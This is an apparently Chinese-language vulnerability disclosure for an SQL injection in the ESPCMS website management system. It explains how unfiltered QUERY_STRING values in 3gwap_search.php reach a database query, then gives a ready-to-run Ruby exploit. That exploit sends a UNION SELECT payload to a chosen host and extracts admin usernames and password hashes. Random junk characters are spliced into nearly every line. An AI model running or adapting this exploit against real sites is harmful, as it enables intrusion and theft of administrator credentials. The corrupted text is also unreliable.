0×0 漏洞概述0×1 漏洞细节
: P+ z( [3 H3 A5 A0×2 PoC: ?; Q/ S5 B) c+ d3 y( y$ y% B
1 m$ C4 |5 k6 o5 _2 U1 R
& `1 e. F5 w8 \ a" _3 G
% H- R4 f( j9 b3 ?0×0 漏洞概述
- N+ p0 a U! b& w/ ~) Y
" n" I" Y7 E& T9 m, C) b易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
# f8 k1 `7 V3 ]4 c4 w其在处理传入的参数时考虑不严谨导致SQL注入发生
a4 F \% ~7 M. P! G
& U4 v# ~9 J* R9 _# n' i8 P! } K& W% t
0×1 漏洞细节3 \1 V( B$ l2 C8 C3 A
7 j& h H% H$ |3 f7 J6 ~) q# P变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
; r# V) R; Y N4 I+ ~3 M正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。5 i Q+ Q: y5 Q2 v
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
' [9 f+ a H, H& N7 J4 S! d `% ?
在/interface/3gwap_search.php文件的in_result函数中:
; z' \3 P: a s" |# j; ]2 b9 T1 x. r
1 W# @. j: k# X6 o, m
7 C; V; S4 \9 g" v2 o: l function in_result() {
+ d2 o4 ` P7 m# _: H1 e$ ] ... ... ... ... ... ... ... ... ...
C* b" F, A/ i9 P$ e" v $urlcode = $_SERVER[ 'QUERY_STRING '];9 P' T( e6 |8 g+ r: x' I
parse_str(html_entity_decode($urlcode), $output);
2 v+ M' W/ k5 s) t' G4 @; u! ~) Q( A7 B9 n9 I
... ... ... ... ... ... ... ... ...- R1 l/ h9 q* k7 U! H
if (is_array($output['attr' ]) && count($output['attr']) > 0) {/ t, V) Z9 D0 t
) ^9 h; S3 b' k $db_table = db_prefix . 'model_att';
$ F4 J/ j/ @ B5 r9 J. ~; k, u- _8 T; T; \6 X# i
foreach ($output['attr' ] as $key => $value) {
- ]) Z/ L$ i R if ($value) {
7 C' y2 }8 J9 D4 U X5 V2 M' R0 `2 r$ Y4 N& ?* Q# W4 a# g( x
$key = addslashes($key);
4 u/ o* s5 [/ a $key = $this-> fun->inputcodetrim($key);
! G! o+ ^. ?) ^/ n $db_att_where = " WHERE isclass=1 AND attrname='$key'";
/ F6 u! i4 c- d* L V3 o, s $countnum = $this->db_numrows($db_table, $db_att_where);
/ ~7 w/ H# v9 f- j9 p if ($countnum > 0) {
3 o) H. x' h* B! _ $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;/ n- K) h6 ?! L9 R2 l& E: i* c
}
' Z6 P4 J# M, g. n b }
3 @# ~* i* e* R* u; X1 b4 j }$ s- }, \1 n) k6 l/ j' x6 r: ^
}8 }2 c3 p. U& D1 X( r/ O5 O1 l
if (!empty ($keyword) && empty($keyname)) {
% J) \7 d4 ?/ |$ w$ [ _. j+ R! A $keyname = 'title';" N( u# m5 m# I) c9 i& ^+ e
$db_where.= " AND a.title like '%$keyword%'" ; V3 l& L+ E. [* G
} elseif (!empty ($keyword) && !empty($keyname)) {) W' F: V: r3 w
$db_where.= " AND $keyname like '% $keyword%'";
2 h8 v7 n- Y+ j$ P }
1 a G; s( F- f; `3 x7 B $pagemax = 15;
9 G. W3 f2 P3 E: H) L5 ]3 y3 N: n* N3 ~3 R, k! {
$pagesylte = 1;4 d; ]; r3 O$ G+ n) h
9 i, q. u" G/ Y6 [7 G( i& z if ($countnum > 0) {
p( f2 Z: T, Z7 i8 u8 |6 h& k4 U ~1 @4 _7 t
$numpage = ceil($countnum / $pagemax);
! d/ _* k/ V" i2 l" e } else {" [$ C2 Z% K) T
$numpage = 1;
/ x4 @ c6 a7 `/ \& ]0 [4 g$ N }
( w4 g6 h \# c* D2 r" ` $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
4 A+ T' s8 n' E$ j $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);# [ ] J# k+ v0 Q+ {
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
: c+ J. U/ Z% b- y2 e: I. G ... ... ... ... ... ... ... ... ...' W# y7 U" ^) }5 v
}
5 H5 i2 B" S1 q. k" }$ I/ @9 |2 H; W" h/ G u l2 q; ?+ Q, R
& p4 g1 T$ R( ~( a- d& o- i9 D; a
0×2 PoC
+ W2 y+ m7 O0 w4 c7 S" @. ?$ |1 f( ]8 L3 B' W- \7 L
7 g/ W3 |1 z7 B0 O# v3 N* @
2 p3 K, Z6 j5 d) v y1 Srequire "net/http"; f" B1 X6 T, `! f5 M* i& |
- Q: K4 E- _3 c0 y6 _5 }! [def request(method, url)
( D4 ]' U9 b' T8 s, d if method.eql?("get")
& D3 d# g6 x s uri = URI.parse(url)3 _" V% `4 r+ w" W4 B! I8 A" y
http = Net::HTTP.new(uri.host, uri.port)
; k7 c- b0 z" T- J: N6 X response = http.request(Net::HTTP::Get.new(uri.request_uri))% o$ d8 T: @: P
return response5 @3 z# r" p2 |/ d/ L9 C4 o
end
& `% \0 i" o# ~$ [/ pend# l* s0 S1 H, {% r
# k! T, M$ F/ K1 Qdoc =<<HERE7 h% B' z* O& Y, F8 g
-------------------------------------------------------& y$ ^4 v: ^6 ?
Espcms Injection Exploit
% ~. e6 v+ d% l2 C. v, ` _0 vAuthor:ztz* a% x3 P9 e U, O% @
Blog:http://ztz.fuzzexp.org/
J8 y1 z6 L! d/ B9 I-------------------------------------------------------
; f, s) O, K7 k( f2 R( t
0 Z p7 n# b, }% A. qHERE' V& V' g. y _ c2 {% F5 _0 [
7 p4 R9 K4 g9 ?6 N) r; r
usage =<<HERE6 T! s [9 P* a8 M" {
Usage: ruby #{$0} host port path4 \9 Z6 a D3 r3 w' k' S
example: ruby #{$0} www.target.com 80 /0 R6 \, n4 J' _: B; [6 `
HERE4 S; g2 i8 g: Q1 M+ ^
$ B9 v- u1 {) b3 z# s7 P' e
puts doc
" O! G" E. W3 b; t6 _1 b8 hif ARGV.length < 3% F2 O H3 J' G4 {, f
puts usage
( s, y1 H- K( {8 ielse
- c* `4 Q, d8 J1 u# c8 k $host = ARGV[0]4 k7 W# V% b* M1 c/ S$ B! r7 ^
$port = ARGV[1]
1 z5 J5 K$ n3 U$ l; H% \3 v$ e $path = ARGV[2]& C2 v9 Y# P3 C1 a% ^# a' R
9 N# F }& ?. b- [
puts "send request..."
4 j [* k m; F8 r5 |; d% I url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
) N# o; ^$ p1 H$ ]: H! f+ y0 Tattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
( i4 Z$ O; m* U6 F5 V2 g0 z,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27. g! V1 X; e5 w! t
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"; ]! q" Y+ k+ |/ F% R i
response = request("get", url)
7 C0 K! ^4 P0 @, {; m4 w0 Y result = response.body.scan(/\w+&\w{32}/)
8 T& B" M4 i. p. M/ ~" Q puts result
/ K' {" J+ ~4 C4 R# }end6 | y V6 N6 l* I# N
) h( J4 O+ [, n/ Y6 v" _1 y |